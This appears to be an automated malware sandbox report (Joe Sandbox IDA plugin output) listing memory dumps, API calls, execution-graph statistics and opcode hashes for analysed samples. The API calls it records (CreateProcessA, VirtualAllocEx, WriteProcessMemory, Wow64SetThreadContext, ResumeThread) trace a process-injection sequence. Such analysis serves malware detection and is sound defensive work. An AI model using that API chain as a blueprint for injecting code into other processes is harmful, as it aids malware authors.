                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 071EB9BD
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 071EB9BD
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1600692785.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_141d000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Memory Dump Source
                        • Source File: 00000000.00000002.1600692785.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_141d000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Memory Dump Source
                        • Source File: 00000000.00000002.1600757653.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_142d000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Memory Dump Source
                        • Source File: 00000000.00000002.1600757653.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_142d000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Memory Dump Source
                        • Source File: 00000000.00000002.1600757653.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_142d000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Memory Dump Source
                        • Source File: 00000000.00000002.1600692785.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_141d000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Memory Dump Source
                        • Source File: 00000000.00000002.1600692785.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_141d000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Memory Dump Source
                        • Source File: 00000000.00000002.1600757653.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_142d000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b45452ff36ccf171b58ba96a6db3430600b1fbfab4e67b74f20ffb50b37cf843
                        • Instruction ID: 9ddfdd9bd6bf59983c176141cc79e5cc3fbca076f24571f0add1768a04148cf4
                        • Opcode Fuzzy Hash: b45452ff36ccf171b58ba96a6db3430600b1fbfab4e67b74f20ffb50b37cf843
                        • Instruction Fuzzy Hash: C211BB75904280DFDB12CF54C5C4B16BBA2FB85224F24C6AAD8494B3A6C33AD44ACB61
                        Memory Dump Source
                        • Source File: 00000000.00000002.1600692785.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_141d000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e9153ca0515fe0df197e5410c3446fb94a90a4056a18f54ff342b0d46bdfe340
                        • Instruction ID: 2c0009123326ebb92c7cf18d3099fc039b5b23dc06b44e5e6e7f284ac5b023ea
                        • Opcode Fuzzy Hash: e9153ca0515fe0df197e5410c3446fb94a90a4056a18f54ff342b0d46bdfe340
                        • Instruction Fuzzy Hash: E9012BB14043849FF7205E65CC88B67FBD8EF41234F08C52BED280A29BD3799441CAB6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1600692785.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_141d000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: de3b6ea32455d89d9d27ea77bba5a7f7f10e491d6461e8f082b8fdf81ba99f05
                        • Instruction ID: 5a09586f8522436969697837f6a605c7c80c55815ffaafa00613ff50d4ed6ac7
                        • Opcode Fuzzy Hash: de3b6ea32455d89d9d27ea77bba5a7f7f10e491d6461e8f082b8fdf81ba99f05
                        • Instruction Fuzzy Hash: 98F062754043849FE7219E1AC888B67FFD8EF81634F18C45AED584A297C379A844DBB1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9761bb1c159190e7542cb0d2b0ad6050b09b8262b93e1bc9fef793f3f6277260
                        • Instruction ID: 8ed98d21480a9aea1e31db9c93a36af66005114a10198944e8d756aecd279cbc
                        • Opcode Fuzzy Hash: 9761bb1c159190e7542cb0d2b0ad6050b09b8262b93e1bc9fef793f3f6277260
                        • Instruction Fuzzy Hash: 8BD16BB1701B018FDB2ADB75D850BAEB7FBAF89600F148469D1869B7D0CB35E901CB91
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 517b547f81fae2f9bfc9ab54a8405f1c88cff6b450de789f52f4a84b14fe75a0
                        • Instruction ID: d61c1704693be91a76d2284e80f2044b84640c81894faa789d965dc639b8cafe
                        • Opcode Fuzzy Hash: 517b547f81fae2f9bfc9ab54a8405f1c88cff6b450de789f52f4a84b14fe75a0
                        • Instruction Fuzzy Hash: 7DE12DB4E006198FDB14DFA8D5909AEFBF6FF89304F24816AD814AB395D731A941CF60
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a410d71f58d41c00220d8116c60e5b1f95645194b99f69dc19a23518af04c02e
                        • Instruction ID: abfe50fb7fc6593202b566d05c5c84dfe62bc60ab028ace8609530098451c664
                        • Opcode Fuzzy Hash: a410d71f58d41c00220d8116c60e5b1f95645194b99f69dc19a23518af04c02e
                        • Instruction Fuzzy Hash: 61E12EB4E006598FDB14DFA8C590AAEFBF6FF89304F24816AD814AB355D7319941CF60
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 061a4a14cc9ab71b6e8acd75a011ccc17d610c6344a8f4f0aff4ef25d397e7f1
                        • Instruction ID: 35b7c77b762fa97e0f86308c92cc2b6eabb28cc7b91e2498324a3ed3dd56f103
                        • Opcode Fuzzy Hash: 061a4a14cc9ab71b6e8acd75a011ccc17d610c6344a8f4f0aff4ef25d397e7f1
                        • Instruction Fuzzy Hash: 8AE13DB4E006598FDB14DFA9C5909AEFBF6FF89300F24816AE814AB355C7319941CFA0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1f72c698f228396c1be9b15c4572153d94a5981fc67e00a34a5b8646417ec17d
                        • Instruction ID: 322a921bfbcce45f6b8aecd69ef85da6ac05f2bf1bcc314b5ee9319ba330b3a7
                        • Opcode Fuzzy Hash: 1f72c698f228396c1be9b15c4572153d94a5981fc67e00a34a5b8646417ec17d
                        • Instruction Fuzzy Hash: 3DE13CB4E106598FDB14DFA8C590AAEFBF6FF89301F24816AE814AB355C7319941CF60
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d2aa161c4b570af8fb55056119d6578898cd1d6394541b5a1b5d5a4dc47a9971
                        • Instruction ID: a2f94a41eae019a1478397786d2977ac4869db776219b02763476f0a0c3ef365
                        • Opcode Fuzzy Hash: d2aa161c4b570af8fb55056119d6578898cd1d6394541b5a1b5d5a4dc47a9971
                        • Instruction Fuzzy Hash: 5AE13DB4E006198FDB14DFA8C9909AEFBF6FF89305F24816AD814AB355D731A941CF60
                        Memory Dump Source
                        • Source File: 00000000.00000002.1601365371.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2e10000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3eae717ae088420f1afcbd376b41f7adac2013edea0334e3bdf7848808959c93
                        • Instruction ID: fc6f6e7afffcd1c64e4665e8cbde166c01fe05e5df15803aae0f7cf2b8b743af
                        • Opcode Fuzzy Hash: 3eae717ae088420f1afcbd376b41f7adac2013edea0334e3bdf7848808959c93
                        • Instruction Fuzzy Hash: 0AA17B32A102198FCF19DFA5C8445DEBBB2FF89304B15957AF806AB265DB31E905CF80
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a1f0657ba5b0fdc5bc21edaff6bd14f80f0e54dc4390f2fd77d343df00436e26
                        • Instruction ID: e03b6f55b7d6e40142514bac22fdea074a422e4eb88e0f5cd8753daf09fc64a8
                        • Opcode Fuzzy Hash: a1f0657ba5b0fdc5bc21edaff6bd14f80f0e54dc4390f2fd77d343df00436e26
                        • Instruction Fuzzy Hash: AC514BB0E102198FDB14DFA9C9909AEFBF6BF89304F24C16AD418AB355D7319941CFA1

                        Execution Graph

                        Execution Coverage: 11.4%
                        Dynamic/Decrypted Code Coverage: 100%
                        Signature Coverage: 0%
                        Total number of Nodes: 286
                        Total number of Limit Nodes: 12

                        Control-flow Graph

                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID: $
                        • API String ID: 0-227171996
                        • Opcode ID: 4990afce1efafe64da4aef9abe3b156837343f15feffd79e1af69c1976d3abb0
                        • Instruction ID: b1b2f67d0f39c8ed8d2135831334efa7cfd8fec7d80f05e735e324a1cdb87656
                        • Opcode Fuzzy Hash: 4990afce1efafe64da4aef9abe3b156837343f15feffd79e1af69c1976d3abb0
                        • Instruction Fuzzy Hash: 3271A075910701CFEB10EF29D484A55B7B1FFC6315B4086A8D949AF21AEB79F889CF80

                        Control-flow Graph

                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID: $
                        • API String ID: 0-227171996
                        • Opcode ID: 663718673c8408d3f833cee51b911f663b879109316756a5b16b86948bf4576a
                        • Instruction ID: ac1496c19be1cd4b456619cafeb3debc1857c2399356b1af03445b8314a6db74
                        • Opcode Fuzzy Hash: 663718673c8408d3f833cee51b911f663b879109316756a5b16b86948bf4576a
                        • Instruction Fuzzy Hash: DC71B175910701CFEB10EF29D884A55B7B1FF86315B4086A8D949AF31AEB79F885CF80

                        Control-flow Graph

                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 071578AE
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1681994046.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7150000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: f787b9aca8fd68840daa8e024e5f42d51a2dd2b10e6944c56e627b2ef34a9209
                        • Instruction ID: 0dea056dba4d940c95ede8be3b84a29ac670eb4c596e8c26397046efad303c29
                        • Opcode Fuzzy Hash: f787b9aca8fd68840daa8e024e5f42d51a2dd2b10e6944c56e627b2ef34a9209
                        • Instruction Fuzzy Hash: 0BA14BB1D00219DFEB25CF68C845BEEBBB2BF49310F1485A9DC58A7280DB749985CF91

                        Control-flow Graph

                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 071578AE
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1681994046.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7150000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: a2670f1d1068e8c1ef5a102295f1464284d96484330ff8a6e3bb7271ed96665f
                        • Instruction ID: ee8e553d0aa0f275414f0720d84b5872f4e4a9a989ebaa234372fc8b68d49604
                        • Opcode Fuzzy Hash: a2670f1d1068e8c1ef5a102295f1464284d96484330ff8a6e3bb7271ed96665f
                        • Instruction Fuzzy Hash: F0914AB1D00219DFEB15CF68C846BEEBBB2BF48310F1585A9DC18A7280DB749985CF91

                        Control-flow Graph

                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,028FD58E,?,?,?,?,?), ref: 028FD64F
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1676258069.00000000028F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_28f0000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: de368fc9d19ab8d5337608d9a60b622d7c02055e2cf4b6f64829f60c067b1a6a
                        • Instruction ID: d033ef24314c63b744ec38a8d099cf124d5cad9d60bdfa8b06fe09c9bb771f88
                        • Opcode Fuzzy Hash: de368fc9d19ab8d5337608d9a60b622d7c02055e2cf4b6f64829f60c067b1a6a
                        • Instruction Fuzzy Hash: 3B417974900348EFEB11CF69C444B9ABBF1FB48318F108859E258EB691C3B6E945CFA5

                        Control-flow Graph

                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04F01E02
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680747905.0000000004F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f00000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: CreateWindow
                        • String ID:
                        • API String ID: 716092398-0

                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 028F59C9
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1676258069.00000000028F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_28f0000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0

                        APIs
                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 04F04381
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680747905.0000000004F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f00000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: CallProcWindow
                        • String ID:
                        • API String ID: 2714655100-0

                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 028F59C9
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1676258069.00000000028F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_28f0000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0


                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07157480
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1681994046.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7150000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0

                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07157480
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1681994046.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7150000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0

                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07157560
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1681994046.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7150000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07156E9E
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1681994046.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7150000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,028FD58E,?,?,?,?,?), ref: 028FD64F
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1676258069.00000000028F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_28f0000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07156E9E
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1681994046.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7150000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07157560
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1681994046.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7150000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0715739E
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1681994046.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7150000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0715739E
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1681994046.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7150000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1681994046.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7150000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1681994046.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7150000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 0715A90D
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1681994046.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7150000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 0715A90D
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1681994046.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7150000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 028FB33E
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1676258069.00000000028F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_28f0000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Instruction ID: d84e8f13a070b44a90d380035ab551aff69480ff48c2d7472013092cbc31dec1
                        • Opcode Fuzzy Hash: 594fe24720207ae5f98de8f83a0faa9eb2ae16efe366ad2d26d943b5bc41fcd0
                        • Instruction Fuzzy Hash: D651FA7191070ADFCB41DF68C880999FBB5FF49320B14C75AE859EB255EB70E985CB80
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 928f31884cbd46629f7c2e1d784dffae97389a7c591a7016239b1ce23165900b
                        • Instruction ID: 8a904362fd32bb85cb90aae893c325061f728d60321948911ce052820da50612
                        • Opcode Fuzzy Hash: 928f31884cbd46629f7c2e1d784dffae97389a7c591a7016239b1ce23165900b
                        • Instruction Fuzzy Hash: A151F534A10605CFCB04EF68C89899DBBF6FF89705B1585A9E5069B371EB70ED46CB40
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ee67376b19ec210653d56478d71e63367d52663be7c2c550b709b6ff79cfdd89
                        • Instruction ID: af93dd30326ecf6847303514eefd54b5d0cf761176bd03a3e6ffa1dbdcf6c9bb
                        • Opcode Fuzzy Hash: ee67376b19ec210653d56478d71e63367d52663be7c2c550b709b6ff79cfdd89
                        • Instruction Fuzzy Hash: F4319070E02218DFDB14DFA0E9845DDBBB2FF85316F228499E44267791DB31AC66CB50
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d5f70c5d2e9897a5ccc68f670299e4f2c2b70512bed210b28d5fda753f47b739
                        • Instruction ID: 0b29fae5de53d023e6ae0711becd9258bf52be9522b0b7ff039f85c6af6096a3
                        • Opcode Fuzzy Hash: d5f70c5d2e9897a5ccc68f670299e4f2c2b70512bed210b28d5fda753f47b739
                        • Instruction Fuzzy Hash: 3F418875B142548FDB14EF69C884EADBBF6BF89705F1480A9E501EB3A1CB31E801CB10
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5950c5af335daed2bb95827d4687ed4ed040044015d7ae10764897b69b8a3240
                        • Instruction ID: 807f6cb2f336483bde9a028ba86409a778daee34847c6b51915406fa3dd388a7
                        • Opcode Fuzzy Hash: 5950c5af335daed2bb95827d4687ed4ed040044015d7ae10764897b69b8a3240
                        • Instruction Fuzzy Hash: 4D417A75E01219CBDF11EFBAE844AEDBBF1AB88315F144029D845EB350DB35E802DBA0
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 61bc78e34155e16347350c537a4dc5c8dc52b82e9330eb4462ec19f0ee1a5972
                        • Instruction ID: 2a37e5a15eab2d4d64da90deb6ae38d91cc06403f6ecdf0e0d78ca3e05152703
                        • Opcode Fuzzy Hash: 61bc78e34155e16347350c537a4dc5c8dc52b82e9330eb4462ec19f0ee1a5972
                        • Instruction Fuzzy Hash: 2F41D631E05608DFDB00EF78C94099EBBB5FF89300F1585A9E545AB225EB30E945CB91
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7a77022b7586a38db22cf4ca3d859c85c91676b13e13adde41be7f756de9daa0
                        • Instruction ID: b8296a0785320c6ff4413d9d4e497f547ee62b4adbf5a4971acf53759d1ba9f2
